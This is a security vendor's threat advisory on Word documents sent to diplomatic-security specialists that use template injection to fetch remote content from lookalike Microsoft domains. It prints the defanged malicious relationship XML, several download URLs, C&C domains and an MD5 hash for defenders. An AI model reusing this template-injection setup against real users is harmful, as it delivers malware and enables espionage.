Word Documents Disguised as Normal MS Office URLs Being Distributed

Recently, there has been a case of malware disguised as a Word document being distributed through certain paths (e.g. KakaoTalk group chats).

The ASEC analysis team has discovered during our additional monitoring process that the URL used in the fake Word document is becoming very cleverly disguised to closely resemble the normal URL, and we wish to advise caution on the part of users.

The currently identified filenames of the malicious Word documents are as follows.
The real names of Koreans found in the filenames have been removed (○○○), but it is important to note that they were names of specialists in the field of diplomatic security, and the filenames were related to North Korea, China, surveys, or diplomatic security.

• International Legal Review of the Northern Limit Line (NLL) Issue and.docx
• Implications and Prospects of Xi Jinping’s Third Term.docx
• National Security Organizations.docx
• NK, Unprecedented Offensive and Provocative Survey.docx
• ○○○, RIES_Issue Insight_Vol.33, Xi Jinping’s Third Term Begins – Where Is China Headed.docx
• (Debate2_Reference-1)Chip_4Alliance and Korea’s Choice (○○○ contribution).docx
• (Debate2_Reference-2)Chip_4Alliance and Foreign Policy.docx
• (World Korean) Implications and Future Prospects of Xi Jinping’s Third Term.docx
• Fashion and Human Rights Survey.docx

The above files are all Word documents in the OOXML (Office Open XML) format. and the Template Injection feature was used in the attack. The following XML code shows the settings.sml.rels file within a particular Word document.

<?xml version="1.0" encoding="UTF-8" standalone="yes"
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="hxxp://schemas.openxmlformat[.]org/officeDocument/2006/relationships/o/word
officeid=NPW5D●●●DBS3V" TargetMode="External"/></Relationships>

A notable point is that the address used for the external URL has become very similar to the normal URL. Upon examining the root domain area of the following URL, we can see that it has been disguised meticulously by changing a single character in openxmlformats.org to openxmlformat[.]org.

• Normal URL: http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate
• Malicious URL: hxxp://schemas.openxmlformat[.]org/officeDocument/2006/relationships/o/word?officeid=NPW5D●●●DBS3V

Additionally, it has been identified that the following URL formats had been used in the attacks, and we can see that it has been cleverly disguised to the point where users can easily confuse the malicious domains with normal domains, such as ms-office[.]services / ms-offices[.]com / offices.word-template[.]net.

• hxxps://ms-office[.]services/templates-for-word/download?id=79B9●●●I9RWT
• hxxps://ms-office[.]services/templates-for-word/download?id=V2BX●●●WE1A
• hxxps://ms-office[.]services/templates-for-word/download?id=I5I2●●●MGW
• hxxps://ms-office[.]services/templates-for-word/download?id=EFHO●●●5UCV
• hxxps://ms-offices[.]com/templates-for-word/download?id=ZQ9H●●●YP8G
• hxxps://ms-offices[.]com/templates-for-word/download?id=AL03●●●KZ2
• hxxps://ms-offices[.]com/templates-for-word/download?id=DTF●●●SE6
• hxxp://offices.word-template[.]net/office/template?view=GYIJ●●●0D4E

The properties of some of the collected Word files showed that they were generated and distributed indiscriminately across several days at short intervals.

Users must update V3 to the latest version and refrain from opening document files from unknown sources.

Also, considering that malicious documents are being distributed indiscriminately nowadays, users are advised to confirm with the file sender about the file transmission, even if the file was forwarded from a credible user.

[File Detection]
– Downloader/DOC.External (2022.11.01.01)
– Downloader/DOC.Kimsuky (2022.11.05.00, 2022.11.06.00, 2022.11.10.01 and others)
– Downloader/XML.Generic (2022.11.11.03)

[IOC]
MD5
– d698fccf14f670595442155395f42642

C&C
– hxxps://ms-office[.]services
– hxxps://ms-offices[.]com
– hxxp://offices.word-template[.]net
– hxxp://schemas.openxmlformat[.]org

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

The post <strong>Word Documents Disguised as Normal MS Office URLs Being Distributed</strong> appeared first on ASEC BLOG.

Article Link: Word Documents Disguised as Normal MS Office URLs Being Distributed - ASEC BLOG